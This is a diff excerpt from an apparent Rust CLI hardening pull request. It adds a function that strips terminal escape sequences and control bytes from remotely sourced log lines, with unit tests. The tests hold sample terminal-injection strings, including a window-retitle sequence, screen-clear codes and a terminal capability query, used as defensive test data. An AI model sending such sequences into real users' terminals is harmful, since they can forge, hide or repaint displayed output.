         assert_eq!(json["count"], 42); // This parses as a number
+    }
+}
+
+/// Strip terminal control sequences from a remotely sourced log line.
+///
+/// Log text is written by whatever is running in the service, which in a shared
+/// project is not the same principal as whoever is reading it. Printing raw
+/// `ESC` bytes lets the writer drive the reader's terminal — retitling the
+/// window, repainting the screen, hiding or forging output. Colour is dropped
+/// along with everything else: the alternative is parsing which sequences are
+/// benign, and that varies by emulator.
+///
+/// JSON output is untouched; serde already escapes these bytes.
+pub fn strip_terminal_controls(message: &str) -> String {
+    let mut out = String::with_capacity(message.len());
+    let mut chars = message.chars().peekable();
+
+    while let Some(ch) = chars.next() {
+        match ch {
+            // CSI (ESC [ ... final), OSC (ESC ] ... BEL or ST), and the
+            // two-character escapes. Consume the whole sequence.
+            '\u{1b}' => match chars.next() {
+                Some('[') => {
+                    for next in chars.by_ref() {
+                        if ('\u{40}'..='\u{7e}').contains(&next) {
+                            break;
+                        }
+                    }
+                }
+                Some(']') => {
+                    while let Some(next) = chars.next() {
+                        if next == '\u{7}' {
+                            break;
+                        }
+                        if next == '\u{1b}' && chars.peek() == Some(&'\\') {
+                            chars.next();
+                            break;
+                        }
+                    }
+                }
+                _ => {}
+            },
+            // Keep tab and newline; drop the rest of C0 and DEL, which can
+            // reposition the cursor or erase what was already printed.
+            '\t' | '\n' => out.push(ch),
+            c if (c as u32) < 0x20 || c as u32 == 0x7f => {}
+            // C1 controls, reachable directly in UTF-8.
+            c if ('\u{80}'..='\u{9f}').contains(&c) => {}
+            c => out.push(c),
+        }
+    }
+
+    out
+}
+
+#[cfg(test)]
+mod terminal_control_tests {
+    use super::strip_terminal_controls;
+
+    #[test]
+    fn strips_osc_and_csi_sequences() {
+        assert_eq!(strip_terminal_controls("\u{1b}]0;pwned\u{7}hello"), "hello");
+        assert_eq!(strip_terminal_controls("\u{1b}[31mred\u{1b}[0m"), "red");
+        // OSC terminated by ST rather than BEL.
+        assert_eq!(strip_terminal_controls("\u{1b}]0;t\u{1b}\\after"), "after");
+    }
+
+    #[test]
+    fn strips_bare_control_bytes_but_keeps_tabs_and_newlines() {
+        assert_eq!(strip_terminal_controls("a\u{7}b"), "ab");
+        assert_eq!(strip_terminal_controls("a\rb"), "ab");
+        assert_eq!(strip_terminal_controls("a\u{8}b"), "ab");
+        assert_eq!(strip_terminal_controls("a\u{9b}[2Jb"), "a[2Jb");
+        assert_eq!(strip_terminal_controls("a\tb\nc"), "a\tb\nc");
+    }
+
+    #[test]
+    fn leaves_ordinary_text_alone() {
+        assert_eq!(
+            strip_terminal_controls("GET /health 200 12ms — ok ✓"),
+            "GET /health 200 12ms — ok ✓"
+        );
+    }
+
+    #[test]
+    fn output_never_contains_an_escape_byte() {
+        for raw in [
+            "\u{1b}]0;x\u{7}",
+            "\u{1b}[1;31m",
+            "\u{1b}P+q544e\u{1b}\\",
+            "plain",
+        ] {
+            assert!(!strip_terminal_controls(raw).contains('\u{1b}'));
+        }
     }
 }

--- a/src/util/mod.rs
+++ b/src/util/mod.rs
@@ -4,6 +4,7 @@ pub mod compare_semver;
 pub mod detect;
 pub mod editor;
 pub mod git;
+pub mod host_env;
 pub mod install_method;
 pub mod logs;
 pub mod progress;


### PR DESCRIPTION
Hardening pass across the CLI.

- input validation on paths, URLs, and remote-supplied names
- file permissions on credential and generated files
- output encoding for logs and generated config
- tests for each